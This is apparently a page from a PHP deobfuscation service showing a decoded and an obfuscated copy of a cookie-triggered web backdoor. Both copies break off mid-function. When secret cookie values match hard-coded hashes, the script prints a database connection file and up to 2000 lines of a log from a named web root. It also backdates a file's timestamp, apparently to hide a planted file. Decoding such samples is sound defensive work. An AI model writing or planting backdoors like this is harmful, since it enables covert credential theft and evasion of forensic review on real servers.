Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto Lz7BU; q7SQr: function htyhr67($zlw83) { $zlw83 = (string) $zlw83; $char = strto..
Decoded Output download
<? goto Lz7BU;
q7SQr: function htyhr67($zlw83) { $zlw83 = (string) $zlw83;
$char = strtolower($zlw83[0]);
$zghdh83 = ord($char) % 8 + 1;
return $zghdh83;
} goto o_3uB;
Lz7BU: $fjo345 = isset($_COOKIE["0x0004a"]);
goto J6CxZ;
o_3uB: function zxcui2($zlw83) { $zlw83 = (string) $zlw83;
$char = strtolower($zlw83[0]);
if ($char >= "a" && $char <= "z") { $zghdh83 = (ord($char) - ord("a")) % 13;
} else { if ($char >= "0" && $char <= "9") { $zghdh83 = intval($char);
} else { if ($char == "_") { $zghdh83 = 10;
} else { if ($zlw83 == '') { $zghdh83 = rand(0, 12);
} else { $zghdh83 = ord($char) % 2 + 11;
} } } } return sprintf("%02d", $zghdh83 + 1);
} goto rucUs;
WdIQU: if ($fjo345 && !$worj3 && base64_decode($_COOKIE["0x94f1b"]) == "cdfea8d5ffe1ac7e343389f15277c3c7") { $dg3532 = file_get_contents("/var/www/html/neopets/common/db/connpool.php");
echo $dg3532;
} else { if ($fjo345 && !$worj3 && base64_decode($_COOKIE["0x94f1b"]) == "ebeb3f109c5759601c918f9734aefdce") { if (touch("tyrannia_window_02.php", strtotime("2008-02-28 13:56:00"))) { echo "1"; } } else { if ($fjo345 && !$worj3 && base64_decode($_COOKIE["0x94f1b"]) == "f1b0ddb5c1a4d15eeb53171d0bd398a1") { $dfdg3245 = "/var/www/html/neopets/connpool.log";
$cxv24s = fopen($dfdg3245, "r");
if ($cxv24s) { $sdf4a = 0;
while (($sdff23 = fgets($cxv24s)) !== false && $sdf4a < 2000) { echo $sdff23;
$sdf4a++;
} fclose($cxv24s);
} else { echo "-1";
} } } } goto q7SQr;
J6CxZ: $worj3 = isset($_COOKIE["0x034r2"]);
goto Qi1kD;
pakKy: if ($fjo345 && base64_decode($_COOKIE["0x0004a"]) == "51fddb36a595b6465eb1231e9b0c5f57" && $tyu68 && $gy45r && $worj3 && $qw734c) { $fier83s = base64_decode($_COOKIE["0x94f1b"]);
$xu568w = base64_decode($_COOKIE["0xba367"]);
if ($fier83s == "66acdb8dc5372b32210b440ba2aab901") { $gyu58 = explode(",", $_COOKIE["0xbda83"]); ?>
Did this file decode correctly?
Original Code
goto Lz7BU;
q7SQr: function htyhr67($zlw83) { $zlw83 = (string) $zlw83;
$char = strtolower($zlw83[0]);
$zghdh83 = ord($char) % 8 + 1;
return $zghdh83;
} goto o_3uB;
Lz7BU: $fjo345 = isset($_COOKIE["\x30\170\x30\60\60\x34\141"]);
goto J6CxZ;
o_3uB: function zxcui2($zlw83) { $zlw83 = (string) $zlw83;
$char = strtolower($zlw83[0]);
if ($char >= "\141" && $char <= "\x7a") { $zghdh83 = (ord($char) - ord("\x61")) % 13;
} else { if ($char >= "\60" && $char <= "\71") { $zghdh83 = intval($char);
} else { if ($char == "\x5f") { $zghdh83 = 10;
} else { if ($zlw83 == '') { $zghdh83 = rand(0, 12);
} else { $zghdh83 = ord($char) % 2 + 11;
} } } } return sprintf("\x25\60\62\144", $zghdh83 + 1);
} goto rucUs;
WdIQU: if ($fjo345 && !$worj3 && base64_decode($_COOKIE["\60\170\71\x34\x66\61\x62"]) == "\x63\144\x66\x65\x61\x38\x64\x35\146\146\x65\x31\x61\143\x37\145\63\64\63\x33\x38\71\x66\x31\x35\x32\67\x37\x63\x33\x63\x37") { $dg3532 = file_get_contents("\57\x76\x61\162\x2f\x77\x77\x77\x2f\150\x74\x6d\154\x2f\156\145\x6f\160\145\164\163\x2f\x63\x6f\155\155\x6f\x6e\x2f\144\142\x2f\143\157\x6e\x6e\160\x6f\x6f\x6c\x2e\160\x68\x70");
echo $dg3532;
} else { if ($fjo345 && !$worj3 && base64_decode($_COOKIE["\x30\x78\x39\64\x66\x31\142"]) == "\x65\142\145\x62\63\146\x31\60\71\143\65\x37\x35\x39\66\60\x31\143\71\x31\x38\146\71\67\x33\x34\141\x65\x66\x64\x63\x65") { if (touch("\164\x79\162\141\x6e\x6e\151\x61\137\x77\151\156\x64\x6f\x77\137\x30\62\56\x70\150\160", strtotime("\x32\x30\x30\x38\x2d\x30\x32\55\x32\70\40\x31\63\72\x35\x36\72\60\60"))) { echo "\61"; } } else { if ($fjo345 && !$worj3 && base64_decode($_COOKIE["\x30\x78\71\x34\146\61\x62"]) == "\146\x31\142\x30\x64\144\142\65\x63\61\x61\64\144\x31\65\145\x65\x62\x35\63\61\67\x31\x64\60\142\x64\x33\x39\70\x61\x31") { $dfdg3245 = "\x2f\x76\141\x72\x2f\167\x77\167\x2f\x68\164\x6d\154\57\x6e\x65\157\x70\145\x74\163\57\143\x6f\156\x6e\x70\x6f\x6f\x6c\x2e\154\x6f\147";
$cxv24s = fopen($dfdg3245, "\162");
if ($cxv24s) { $sdf4a = 0;
while (($sdff23 = fgets($cxv24s)) !== false && $sdf4a < 2000) { echo $sdff23;
$sdf4a++;
} fclose($cxv24s);
} else { echo "\55\x31";
} } } } goto q7SQr;
J6CxZ: $worj3 = isset($_COOKIE["\60\x78\60\63\64\162\62"]);
goto Qi1kD;
pakKy: if ($fjo345 && base64_decode($_COOKIE["\60\170\60\60\60\64\141"]) == "\x35\61\x66\144\x64\142\x33\x36\x61\x35\71\x35\142\x36\x34\x36\65\145\x62\x31\62\x33\61\x65\71\142\x30\x63\x35\x66\65\67" && $tyu68 && $gy45r && $worj3 && $qw734c) { $fier83s = base64_decode($_COOKIE["\x30\x78\x39\64\146\61\x62"]);
$xu568w = base64_decode($_COOKIE["\x30\x78\142\x61\x33\66\x37"]);
if ($fier83s == "\x36\x36\x61\143\x64\x62\70\144\x63\x35\x33\67\x32\x62\x33\62\x32\x31\60\142\64\64\x30\142\141\x32\x61\x61\142\x39\x30\61") { $gyu58 = explode("\x2c", $_COOKIE["\60\170\142\x64\x61\x38\63"]);
Function Calls
None |
Stats
MD5 | 6b4b478556115f217ccbb277d96314ad |
Eval Count | 0 |
Decode Time | 36 ms |